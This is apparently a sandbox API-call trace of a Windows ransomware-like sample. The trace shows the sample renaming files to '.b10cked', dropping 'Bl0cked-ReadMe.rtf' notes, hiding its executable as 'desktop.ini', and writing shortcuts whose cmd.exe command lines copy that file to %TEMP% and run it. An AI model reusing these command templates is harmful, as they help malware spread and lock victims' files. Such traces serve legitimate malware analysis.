0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xe2 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xe2 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0210.355] ReadFile (in: hFile=0x120, lpBuffer=0x12fb5e8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesRead=0x12ec08*=0x70, lpOverlapped=0x0) returned 1 [0210.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0210.356] WriteFile (in: hFile=0x120, lpBuffer=0x12fb5e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesWritten=0x12ec1c*=0x70, lpOverlapped=0x0) returned 1 [0210.357] SetFilePointer (in: hFile=0x120, lDistanceToMove=-112, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x72 [0210.357] ReadFile (in: hFile=0x120, lpBuffer=0x12fb5e8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesRead=0x12ec08*=0x70, lpOverlapped=0x0) returned 1 [0210.357] SetFilePointer (in: hFile=0x120, lDistanceToMove=-112, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x72 [0210.357] WriteFile (in: hFile=0x120, lpBuffer=0x12fb5e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesWritten=0x12ec1c*=0x70, lpOverlapped=0x0) returned 1 [0210.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x13286a4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Slice Gallery.url", lpUsedDefaultChar=0x0) returned 21 [0210.362] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xe2 [0210.362] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0210.363] CloseHandle (hObject=0x120) returned 1 [0210.364] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL") returned 0x2c [0210.364] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\") returned 0x20 [0210.365] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x748, dwThreadId=0x114)) returned 1 [0210.366] CloseHandle (hObject=0x1b4) returned 1 [0210.366] CloseHandle (hObject=0x120) returned 1 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Links\\", cchLength=0x21 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\") returned 0x21 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\CONTACTS\\") returned 0x1a [0210.367] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\", cchCount1=33, lpString2="C:\\USERS\\DEFAULT\\CONTACTS\\", cchCount2=26) returned 3 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Links\\", cchLength=0x21 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\") returned 0x21 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0210.367] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\", cchCount1=33, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0210.367] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0210.367] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0210.367] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0210.367] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\") returned 0x20 [0210.367] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0210.367] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0210.367] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x370, dwThreadId=0x938)) returned 1 [0210.560] CloseHandle (hObject=0x1b4) returned 1 [0210.560] CloseHandle (hObject=0x120) returned 1 [0210.560] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\links\\bl0cked-readme.rtf")) returned 0xffffffff [0210.560] GetLastError () returned 0x2 [0210.560] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Favorites\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\links\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0210.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\links\\bl0cked-readme.rtf")) returned 0x20 [0210.563] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.563] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0210.563] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0210.563] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.563] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0210.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0210.564] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0210.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\") returned 0x20 [0210.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0210.564] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0210.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links") returned 0x1f [0210.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x13a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x13a [0210.564] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0210.564] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9ac, dwThreadId=0x9bc)) returned 1 [0210.572] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0211.686] CloseHandle (hObject=0x120) returned 1 [0211.687] CloseHandle (hObject=0x1b4) returned 1 [0211.687] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.687] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0211.687] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0211.687] GetTickCount () returned 0x3b643 [0211.687] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26847612918) returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x54\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x64\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.687] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0211.687] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0211.687] CharUpperBuffW (in: lpsz="explorer.exe \"Links\" & type \"Links\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5b | out: lpsz="EXPLORER.EXE \"LINKS\" & TYPE \"LINKS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5b [0211.687] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0211.687] CharUpperBuffW (in: lpsz="explorer.exe \"Links\" & type \"Links\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5c | out: lpsz="EXPLORER.EXE \"LINKS\" & TYPE \"LINKS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5c [0211.687] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0211.687] CoInitialize (pvReserved=0x0) returned 0x0 [0211.688] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0211.689] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0211.689] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0211.689] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0211.690] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Links\" & type \"Links\\desktop.ini\" > \"%TEMP%\\TRqJvnpd.exe\" && \"%TEMP%\\TRqJvnpd.exe\"") returned 0x0 [0211.690] ShellLink:IShellLinkW:SetWorkingDirectory 